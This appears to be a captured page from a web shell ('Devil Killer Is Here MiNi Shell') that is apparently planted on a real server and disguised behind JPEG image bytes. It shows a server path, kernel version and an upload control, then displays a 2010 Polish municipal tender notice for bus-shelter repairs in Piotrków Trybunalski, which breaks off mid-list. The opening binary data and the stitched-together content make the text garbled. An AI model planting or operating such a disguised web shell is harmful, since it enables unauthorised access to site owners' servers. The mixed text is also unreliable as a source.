JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/326242-N-2010.html

<p class="kh_header"><b>Piotrków Trybunalski: MODERNIZACJA WIAT PRZYSTANKOWYCH 
ORAZ BIEŻĄCĄ NAPRAWĘ I KONSERWACJĘ URZĄDZEŃ 
PRZYSTANKOWYCH USYTUOWANYCH W GRANICACH ADMINISTRACYJNYCH MIASTA PIOTRKOWA TRYBUNALSKIEGO</b><br>
<b>Numer ogłoszenia: 326242 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg i Komunikacji , ul. Belzacka 176, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7339252, faks 044 7329253.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA WIAT PRZYSTANKOWYCH 
ORAZ BIEŻĄCĄ NAPRAWĘ I KONSERWACJĘ URZĄDZEŃ 
PRZYSTANKOWYCH USYTUOWANYCH W GRANICACH ADMINISTRACYJNYCH MIASTA PIOTRKOWA TRYBUNALSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie bieżącej naprawy i konserwacji urządzeń przystankowych komunikacji miejskiej tj wiat konstrukcji przystankowych ławek koszy przewiduje się następujące prace:
1.  Konserwacja konstrukcji przystankowej wykonanej z rur  60 mm i kształtowników 80 
x 50 mm. Usunięcie starej farby i rdzy, malowanie oczyszczonej konstrukcji  farbą 
podkładową i dwukrotnie farbą nawierzchniową olejną czerwoną.
2.  Wykonanie nowej konstrukcji przystankowej z jednej rury ocynkowanej  60 mm oraz    
pomalowanie farbą nawierzchniową olejną czerwoną.
3. Wykonanie nowej konstrukcji przystankowej z dwóch rur  60 mm i kształtowników 
80 x 50 oraz pomalowanie farbą nawierzchniową olejną czerwoną.
4. Konserwacja tablic ze znakiem D -15 poprzez usunięcie rdzy, malowanie farbą olejną  i naklejenie nowego w miejsce zniszczonego emblematu oraz zamontowanie na  konstrukcji  przystankowej.
5.  Konserwacja tablic rozkładowych poprzez usunięcie rdzy, malowanie dwukrotnie farbą olejną białą.
6. Wykonanie nowych tablic rozkładowych z blachy zwykłej grubości 2 mm 
z zabezpieczeniem farbą podkładową i dwukrotnie emalią nawierzchniową białą.
7. Wykonanie nowych tablic na znak D-15 o wym. 0,59 x 0,60 m z blachy zwykłej grubości 2 mm z zabezpieczeniem farbą podkładową oraz dwukrotnie olejną białą  nawierzchniową. Naklejenie nowego emblematu znaku D-15 oraz zamontowanie na  konstrukcjach i wiatach  przystankowych.
8. Wykonanie nowych tablic z blachy (na znak D -15) o wymiarach 0,59 x 0,60 m ze stali         
kwasoodpornej nierdzewnej grubości 2 mm (symbol 1H18N9T) z naklejeniem nowego         
emblematu znaku D-15 oraz zamontowanie na konstrukcjach i wiatach    przystankowych.
9. Wykonanie nowych tablic z blachy (na znak D-15) wg rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków (Dz. U. Nr 220, poz. 2181 ze zm.) o wymiarach 0,60 x 0,60  m ze stali kwasoodpornej nierdzewne  grubości 2 mm (symbol 1H18N9T) z naklejeniem  nowego emblematu znaku D-15 oraz  zamontowanie na konstrukcjach i wiatach przystankowych.
10. Wykonanie tablic informacyjnych ze stali kwasoodpornej nierdzewnej grubości 2 mm   
(symbol 1H18N9T) pod znak D-15.

11. Zdemontowanie tablicy rozkładowej, zamontowanie nowej ze stali nierdzewnej o grubości  2 mm (symbol 1H18N9T) z uprzednim malowaniem farbą nawierzchniową białą i zamontowanie.
12. Naprawa uszkodzonej konstrukcji przystankowej poprzez prostowanie rur lub kształtowników.
13. Naprawa uszkodzonej konstrukcji przystankowej poprzez prostowanie rur lub kształtowników   z uprzednim wykopaniem z miejsca posadowienia.
14. Ustawienie konstrukcji, po dokonanej naprawie, w miejscu uprzedniej lokalizacji.
15. Ustawienie konstrukcji przystankowej w nowym miejscu z uprzednim wykonaniem wykopu  80 x 50 x 110 cm z powierzchniowym zabetonowaniem (grubość min. 7 cm) lub ułożenie  istniejących płyt chodnikowych, kostki betonowej.
16. Usunięcie (wykopanie) konstrukcji przystankowej z miejsca posadowienia 
z przewiezieniem  na miejsce składowania.
17. Ustawienie koszy na odpady komunalne usytuowane w obrębie miejsca przystankowego w wykopie  40 x 40 x 60 cm z powierzchniowym zabetonowaniem grubości min. 5 cm lub  ułożeniem istniejących płyt chodnikowych lub kostki betonowej.
18. Naprawa skorodowanych lub uszkodzonych koszy na odpady komunalne tj. prostowanie,   zamontowanie nowego dna kosza oraz czyszczenie ze starej farby i rdzy, dwukrotne  malowanie farbą olejną.
19. Konserwacja elementów drewnianych ławek (betonowo drewnianych) wolnostojących na miejscach przystankowych, dwukrotne malowanie farbą olejną zieloną.
20. Naprawa i konserwacja ławek (betonowo drewnianych) wolnostojących na miejscach    przystankowych - uzupełnienie brakujących szczeblin oraz dwukrotne malowanie farbą olejną  zieloną.
21. Ustawienie ławek betonowo-drewnianych na wyznaczone miejsce przystankowe.
22. Usunięcie ławek betonowo-drewnianych z przewiezieniem na miejsce składowania.
23. Wykonanie podstawy betonowej ławki. 
24. Przestawienie wiaty typ metalowo oszklony, metalowej, MKCafe, Kami i Gamma 
z miejsca   przystankowego na nowe wyznaczone miejsce przystankowe.
25. Usunięcie wiat typ: metalowo-oszklony, metalowej, MKCafe, Kami i Gamma 
z miejsca   posadowienia i przewiezienie na wyznaczone miejsce składowania. 
26. Malowanie wiat murowanych (wewnątrz i na zewnątrz) farbą emulsyjną przeznaczoną do malowania zewnętrznego z uprzednim uzupełnieniem brakujących fragmentów tynku oraz:
      a) wymiana poszycia dachu blachą trapezową ocynkowaną,
      b) wymiana fartucha okalającego dach.
27. Konserwacja dachów wiat przystankowych pokrytych blachą środkami do 
tego przeznaczonymi.
28. Malowanie farbą czerwoną dachów wiat przystankowych wykonanych z tworzywa.
29. Konserwacja elementów drewnianych ławek wewnątrz wiat przystankowych oraz dwukrotne  malowanie farbą olejną (kolor wg wskazań zamawiającego).
30. Naprawa i konserwacja ławek wewnątrz wiat przystankowych - uzupełnienie brakujących szczeblin oraz dwukrotne malowanie farbą olejną (kolor wg wskazań zamawiającego).
31. Konserwacja poprzez dwukrotne malowanie wiat przystankowych metalowych farbą olejną czerwoną (oraz wiat metalowo-oszklonych zabudowanych blachą) z uprzednim usunięciem   starej farby i rdzy.
32. Konserwacja poprzez dwukrotne malowanie wiat przystankowych metalowo - oszklonych  farbą olejną czerwoną z uprzednim usunięciem starej farby i rdzy.
33. Naprawa wiat przystankowych typ metalowo oszklony, metalowy poprzez wymianę skorodowanych części nośnych z kształtowników stalowych (wycięcie skorodowanego odcinka  konstrukcji i zamontowanie nowego):
a)	o profilu 40x40 mm,
b)	o profilu 50x50 mm,
c)	o profilu 60x60 mm.
34. Zabudowa poprzez oblachowanie części wiaty przystankowej:
a)   blachą zwykłą 1 mm,
b)   blachą zwykłą o grubości 1,5 mm,
c)   blachą ocynkowaną 1,5 mm,
d)   blachą nierdzewną 1,5 mm.
35. Likwidacja wiat przystankowych wraz z pocięciem i przewiezieniem na złomowisko:
a)	typ Kaliski,
b)	typ metalowo-oszklony,
c)	typ metalowy.
36. Naprawa wiaty przystankowej typ KALISKI II (2 daszki):
a)  czyszczenie daszków wiat ze starej farby oraz malowanie na kolor żółty farbą olejną z jednoczesnym wzmacnianiem łączenia daszków, w tym malowanie siedzisk),
b)  czyszczenie konstrukcji nośnych (rur) ze starej farby i rdzy oraz malowanie farbą olejną  czerwoną,
c)  naprawa siedzisk zamontowanych na konstrukcjach nośnych wiat,
d)  wymiana uszkodzonych daszków (na daszki będące w depozycie Zamawiającego).
37. Ustawienie wiaty przystankowej typ KALISKI II w miejscu wskazanym przez    
      przedstawiciela Zamawiającego z dowozem z miejsca składowania lub demontażu.
38. Demontaż wiat przystankowych typ KALISKI II z dowozem na miejsce składowania    
      wskazane przez Zamawiającego.
39. Naprawa wiat przystankowych typ KAMI (przejęte od RUCH SA):
a) zabudowa poprzez oblachowanie dolnej oszklonej (części wiaty blachą nierdzewną   
     grubości 2 mm (symbol 1H18N9T),
b) zamontowanie w pozostałej ? wysokości (otworów po szybach, pleksi, kasetonach   
     reklamowych) szyby ze szkła bezpiecznego gr. 4mm x folia x szyba 4 mm
     z uszczelnieniem SILIKONEM,
c) wykonanie zabezpieczeń oblachowania i szyb kątownikiem 20 x 20 mm 
     z zamocowaniem  nitami zrywanymi grubości 4 mm (stalowe),
d)  konserwacja dachu poprzez malowanie farbą olejną czerwoną,
e)  wykonanie nowych poprzecznych elementów zesztywniających konstrukcję nośną      wiat  z profili stalowych 40 x 40 mm,
f)  wykonanie nowych pionowych elementów zesztywniających konstrukcję nośną wiat 
     z profili  stalowych 30 x 20 mm
40. Konserwacja gablot rozkładowych zamontowanych wewnątrz wiat.
41. Naprawa gablot rozkładowych usytuowanych w wiatach przystankowych.
42. Naprawa gablot reklamowych usytuowanych w wiatach przystankowych typ MK Cafe:
a)	uzupełnienie brakujących szyb o grubości 5 mm z uszczelnieniem Silikonem,
b)	wykonanie tablicy z poliwęglanu spienionego z zainstalowaniem w gablotach reklamowych,
c)	wymiana profilu aluminiowego 40 x 20 mm,
d)	naprawa oświetlenia - wymiana świetlówek 36 W = 120 cm,
e)	wymiana profilu aluminiowego 180 x 25 mm stanowiącego obudowę reklamy.
43. Naprawa i konserwacja kasetonów rozkładowych zamontowanych na wiatach 
i konstrukcjach  przystankowych.
44. Uzupełnienie brakujących obudów z poliwęglanu litego grubości 5 mm.
45. Uzupełnienie brakujących szyb w wiatach przystankowych i kasetonach rozkładowych z uprzednim oczyszczeniem pozostałości (kit, silikon, szkło) szybą grubości 5 mm z uszczelnieniem SILIKONEM.

46. Uzupełnienie brakujących szyb w wiatach przystankowych z uprzednim oczyszczeniem  pozostałości (kit, silikon, szkło) szybą bezpieczną 4 mm szyba folia 4 mm szyba z uszczelnieniem SILIKONEM.
47. Mycie szyb środkami chemicznymi przeznaczonymi do usuwania zanieczyszczeń (namalowań).
48. Naprawa   wiat   przystankowych   aluminiowych   typ   GAMMA zlokalizowanych na   
miejscu przystankowym komunikacji miejskiej Piotrkowa Trybunalskiego:
a)	naprawa uszkodzonego pokrycia dachowego 5,00 x 1,60 m wykonanego 
z poliwęglanu    
litego lub poliwęglanu komórkowego na nowy poliwęglan komórkowy gr. 6 mm,
b)  zamontowanie (podczas naprawy poszycia) dodatkowych wzmocnień międzyprzęsłowych
     z  profili  zamkniętych  30 x 25 mm  z zabezpieczeniem płaskownikiem aluminiowym
      40 x 3 mm,
c)  uzupełnienie brakujących zabezpieczeń (kątowników aluminiowych 30 x 25 mm) naprawianego oblachowania i szyb z zamocowaniem nitami zrywanymi grubości 4 mm (stalowe),
d) wymiana zdewastowanej blachy gr. 2 mm, tworzącej obudowę wiaty (blacha nierdzewna),
e) prostowanie lub wymiana odkształconych aluminiowych elementów nośnych konstrukcji (wycięcie uszkodzenia i przyspawanie uszkodzonego odcinka profilu aluminiowego) oraz pomalowanie powstałych uszkodzeń i zadrapań farbą 
o istniejącym kolorze.
49. Konserwacja poprzez dwukrotne malowanie konstrukcji i obudowy wiat przystankowych typ Gamma aluminiowych farbą olejną czerwoną z uprzednim usunięciem starej farby.
50. Wykonanie tablic rozkładowych z poliwęglanu spienionego z zainstalowaniem w gablotach  rozkładowych.
51. Wykonanie tablic rozkładowych z plexi (kolor biały), z zainstalowaniem w gablotach rozkładowych.
52. Umieszczanie reklam w panelach reklamowych.
53. Ustawienie wiat przystankowych typ metalowo-oszklonych, metalowej, MK Cafe, Kami,  Gamma w miejscu wskazanym przez przedstawiciela zamawiającego z dowozem z miejsca  składowania lub demontażu.
54.  Wykonanie gablot reklamowych w tylnych częściach wiat przystankowych zabudowanych  blachą.
55. Zabezpieczenie elementów poszycia dachu wykonanego z poliwęglanu blachą ocynkowaną 0,5 mm.
56. Przywiezienie z miejsca składowania przystanku tymczasowego i ustawienie w miejscu wskazanym   przez Zamawiającego lub zabranie z miejsca tymczasowego ustawienia do miejsca składowania.
57. Modernizacja wiat przystankowych typ KAMI (przejęte od Urzędu Miasta):
a) zabudowa poprzez oblachowanie dolnej, oszklonej części wiaty blachą ocynkowaną   grubości 1,5 mm,
b)  zamontowanie w pozostałej ? wysokości (otworów po szybach, pleksi, kasetonach reklamowych) szyby ze szkła bezpiecznego gr. 4mm x folia x szyba 4 m z uszczelnieniem SILIKONEM,
c) wykonanie zabezpieczeń oblachowania i szyb kątownikiem 20 x 20 mm z zamocowaniem  nitami zrywanymi grubości 4 mm (stalowe),
d)  konserwacja dachu poprzez malowanie farbą olejną czerwoną,
e)  wykonanie nowych poprzecznych elementów zesztywniających konstrukcję nośną wiat z profili stalowych 40 x 40 mm,
f)  wykonanie nowych pionowych elementów zesztywniających konstrukcję nośną wiat z profili  stalowych 30 x 20 mm.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY PRZEWIDUJE UDZIELENIA ZAMÓWIEŃ UZUPEŁNIAJĄCYCH, O KTÓRYCH MOWA W ART. 67 UST. 1 PKT 6 i 7 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH TJ. DO WYSOKOŚCI 50% ZAMÓWIENIA PODSTAWOWEGO OBEJMUJĄCEGO ZAKRES W PKT II. 1.3) NINIEJSZEGO OGŁOSZENIA</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.76.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:
a)Wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną pracę 
odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia  o wartości co najmniej 30 000,00 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie (referencje) - wg załącznika nr 4;

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujące warunki:

1) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca.
           Wykonawca powinien wykazać, że dysponuje minimum:
- 	środkiem transportu niezbędnym do wykonania zamówienia,
- 	spawarką,
- 	szlifierką,
-	nitownicą,
-	agregatem prądotwórczym,
-	gazami technicznymi,
-	kompresorem,
- 	zapleczem warsztatowym z wyposażeniem ślusarsko - lakierniczym,
-	zapleczem o powierzchni pozwalającej na składowanie urządzeń i wiat przystankowych przeznaczonych do napraw.

Jeżeli wykonawca wskaże w wykazie narzędzia i urządzenia, którymi będzie dysponował, zobowiązany jest dołączyć pisemne zobowiązanie innych podmiotów 
do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń.

Wykonawca w celu potwierdzenia spełnienia powyższego warunku składa wykaz wg załącznika nr 6</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać osoby, którymi dysponuje lub będzie dysponował wykonawca i które będą    uczestniczyć w wykonywaniu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg załącznika nr 3. 
     
Od SPAWACZA - wymaga się:
a) posiadania świadectwa zadania egzaminu spawacza - tzw. certyfikat
oraz
b) posiadania książeczki spawacza w zakresie spawania elektryczno-gazowego
w celu udokumentowania, że SPAWACZ spełnia powyższe wymagania Wykonawca składa oświadczenie zawarte w załączniku nr 3. 

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:

opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - minimum na 30 000,00 zł.
	
Wykonawca przed podpisaniem umowy dostarczy Zamawiającemu aneks do polisy lub innego dokumentu ubezpieczenia do wartości równej wartości złożonej oferty, 
z wyjątkiem sytuacji, gdy złożona do oferty polisa lub inny dokument ubezpieczenia nie opiewa na tą wartość.

Ocena spełnienia  wymaganych  warunków  odbywa  się,  zgodnie  z  regułą: spełnia albo nie spełnia, na  podstawie  dokumentów  załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą  SIWZ.  Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
